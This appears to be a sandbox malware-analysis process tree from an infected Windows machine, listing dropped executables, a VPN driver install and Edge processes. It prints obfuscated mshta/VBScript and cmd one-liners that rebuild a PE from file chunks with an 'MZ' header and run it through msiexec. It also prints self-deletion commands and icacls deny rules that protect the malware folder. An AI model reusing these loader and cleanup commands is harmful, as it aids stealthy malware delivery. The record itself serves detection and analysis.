C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 67DB4E2FF2F9B0DC520363B899A7DC2A C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 31901A814870663F6B6BC076BDF07041 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 82A2BD7E8AB2A48BB1AE70481644416C2⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--loGQqfG2tg"4⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x2dc,0x2e0,0x2e4,0x2b8,0x2e8,0x7ffd79e3dec0,0x7ffd79e3ded0,0x7ffd79e3dee05⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=1872 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2708 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2676 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=2368 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3304 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3292 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3748 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3744 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=2692 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_745A.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Users\Admin\AppData\Local\Temp\84EA.exeC:\Users\Admin\AppData\Local\Temp\84EA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\84EA.exeC:\Users\Admin\AppData\Local\Temp\84EA.exe2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\84EA.exe"C:\Users\Admin\AppData\Local\Temp\84EA.exe" --Admin IsNotAutoStart IsNotTask3⤵
-
C:\Users\Admin\AppData\Local\Temp\84EA.exe"C:\Users\Admin\AppData\Local\Temp\84EA.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"5⤵
-
C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\913F.exeC:\Users\Admin\AppData\Local\Temp\913F.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9334.exeC:\Users\Admin\AppData\Local\Temp\9334.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9A0B.exeC:\Users\Admin\AppData\Local\Temp\9A0B.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9A0B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A0B.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9A0B.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\A71C.exeC:\Users\Admin\AppData\Local\Temp\A71C.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\A71C.exe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\A71C.exe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\A71C.exe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "" == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\A71C.exe" ) do taskkill -IM "%~NxN" /f3⤵
-
C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXewND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF ""/p4nbpeM1nqd~Rrsm~Y "" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )5⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "/p4nbpeM1nqd~Rrsm~Y " == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" ) do taskkill -IM "%~NxN" /f6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt:cLose (cReateOBjECt ( "wscript.ShElL" ). RUN ("CmD /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = ""MZ"" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r " , 0 , tRue ))5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = "MZ" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D& sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OuVq.r"7⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\NXXHJC.d7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "A71C.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\AAB7.exeC:\Users\Admin\AppData\Local\Temp\AAB7.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt1⤵
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt2⤵
-
C:\Users\Admin\AppData\Roaming\ivhhbvtC:\Users\Admin\AppData\Roaming\ivhhbvt1⤵
-
C:\Users\Admin\AppData\Roaming\buhhbvtC:\Users\Admin\AppData\Roaming\buhhbvt1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"2⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{719de96e-a652-534f-b615-c6231f463305}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\7124.exeC:\Users\Admin\AppData\Local\Temp\7124.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7124.exe"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\7124.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7124.exe"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\7124.exe") do taskkill -iM "%~Nxq" -f3⤵
-
C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: ClOSe (creAteObJecT( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q * ",0 , tRUe ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = "MZ" > WSyZI.4& coPY /b /y WSYZI.4+ 0CPM7.G+ TY6DSS.SE+ vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"7⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\UFTH.2~Z7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "7124.exe" -f4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\755B.exeC:\Users\Admin\AppData\Local\Temp\755B.exe1⤵
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task1⤵
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Users\Admin\AppData\Roaming\ivhhbvtC:\Users\Admin\AppData\Roaming\ivhhbvt1⤵
-
C:\Users\Admin\AppData\Roaming\buhhbvtC:\Users\Admin\AppData\Roaming\buhhbvt1⤵
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt1⤵
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
